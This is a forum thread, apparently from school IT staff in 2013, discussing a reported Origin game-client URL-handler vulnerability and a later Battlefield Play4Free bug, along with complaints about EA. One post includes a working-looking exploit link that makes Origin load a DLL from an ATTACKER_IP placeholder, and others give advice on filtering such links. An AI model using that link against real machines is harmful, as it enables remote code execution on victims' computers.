LinkBack URL
About LinkBacksBBC News - Players at risk from game store hack attack
I hate origin. I reluctantly caved and installed it to play Battlefield 3. Wish I never bothered now.
BBC News - Players at risk from game store hack attack
I hate origin. I reluctantly caved and installed it to play Battlefield 3. Wish I never bothered now.
The funny things is... Steam had this exact problem a while back. [Which was fixed pretty quickly.]
EA didn't even bother to check if it was possible with Origin, based on their remote launch method being a copy of Steam's, and pre-patch it.
That label is being hated more and more everyday. Won't be long before a group of people (no names, they're completely anonymous) may vent their frustration out on them.Originally Posted by X-13
I heard they don't forgive. They also, allegedly, don't forget and you should expect them.
There's also a rumour they're in it for "teh lulz".
Great. At least I had Battlefield 3 for Free as I was a SimCity disaster case.
Who knows, all i know is, respect who they are or face the consequences!
@SovietRussia
I pulled out DS3BF3 = too many bugs
I'm guessing it's related to crafting an Origin:// link pointing to something nasty and Origin executes it automatically without warning?
Yes, if something registers as a URL handler then the browser (depends) will prompt you what you want to happen the first time you click such a link. Most people don't read what they are being told and worse click the 'always do this for links like this' too. At which point the URL handler has basically the same level of access as a browser plugin.
I don't imagine it'll be a big deal in most school environments but more generally I think you should pull up an 'average' machine and just check what url handlers you have installed (Java I'm looking at you). There's also scope for your web filter picking up 'odd' URL links. Some one like @tom_newton would know more I imagine.
Last edited by Geoff; 19th March 2013 at 01:18 PM.
Sort of.
^ That would download a DLL from a remote location without your input. But, it could [I think] me modified to do pretty much anything. Especially, if you set it to download a lot of malicious files and a script to run them.Code:origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll
But for how long, now that it's out, 'eh?There is no evidence the loophole has yet been used by malicious hackers.
I think I have an origin account. Think. I had one of the BF games, can't remember which. Don't play it much anyway.
Honestly I haven't bought anything EA in a while. Not because of any boycotts, just because I haven't xD
Though i did get a free copy of Dead Space 3 for putting up with Sim City and a Free copy of BF3 from AMD card i bought a while back. EA is like drugs to me. They make a few good games that I love to play (BF3, Tomb Raider, Sim City) but buying them and supporting them is destroying my humanity. The gaming community really needs to protest this but I know it will never happen
The only way to catch these in filtering is actually to look in-page (possible with your smoothie!) it's computationally cheap to "block any page containing origin://" - much more expensive to "find and replace" it out. Either is possible, but be kind to your CPU and use the "block" method
O course by the time someone clicks the link, all bets are off, as the handler needn't obey proxy rules.
Here's a new one...
Bug in EA's Battlefield Play4Free allows attackers to hijack players' PCs « Ars Technica
Obviously only any issue if you play Battlefield P4F on Windows XP. At this point, you deserve what you get if you are playing games on such an old operating system.The ReVuln researchers identified the root cause of the vulnerability as the way Play4Free invokes an update mechanism. It allows attackers to use the CreateProcessW Windows API to inject a series of variables into commands that allows them to override the whitelist protection. The end result is the ability to upload a batch file to the Windows startup folder of vulnerable machines. The file is automatically executed the next time the computer is rebooted, and depending on its contents, it can install a host of malicious software.
There are currently 1 users browsing this thread. (0 members and 1 guests)
Posting Permissions
